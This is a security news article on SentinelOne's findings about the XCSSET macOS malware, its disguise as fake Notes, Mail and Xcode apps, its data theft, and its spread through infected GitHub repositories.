XCSSET malware authors devise new ways to target MacOS Monterey devices
SentinelOne security researchers have discovered the methods XCSSET malware authors are using to target MacOS Monterey users.
“The malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022,” SentinelOne researchers said.
XCSSET could allow attackers to inject malicious JavaScript code into websites, track Safari browser activity by dumping cookies, and steal sensitive information from Apple Notes, Telegram, Skype, and WeChat.
A previous report also showed how XCSSET could let attackers gain Full Disk Access, Screen Recording and other permissions without user consent.
“One of the more interesting things we noted in recent samples of XCSSET is the developer’s awareness of OS versions and the clear intent that the authors are here for the long run,” the SentinelOne researchers said.
“In the latest version, we also note that XCSSET uses Python to parse and steal data from the user’s (legitimate) Notes.app.”
“XCSSET’s authors have updated their AppleScripts to account for Apple’s recent removal of Python 2.”
The researchers said this malware continues to evade detection by disguising itself as system software or Google and Chrome browser software.
Trend Micro initially uncovered the XCSSET malware in August 2020.
Although XCSSET has been in the wild for two years, there are very few details regarding the threat actors behind the malware and its targets.
Evidence points to Chinese users being extorted for 200 USDT to unlock their stolen accounts.
Some researchers also observed that XCSSET was being embedded in Github repositories.
It seems a new trojan is going around and affecting @Apple #iOS builds. I don’t know the original method of infection, but I’m starting to see some public repos on GitHub being affectedhttps://t.co/EmutE0jCbD
— Pier Fumagalli 💉💉💉🦠💉😷 (@ianosh) June 4, 2021
“At this point in time, it’s unclear whether these infected repos are victims or plants by threat actors hoping to infect unwary users,” the researchers said.
“It has been suggested that unsuspecting users may be pointed to the infected repositories through tutorials and screencasts for novice developers.”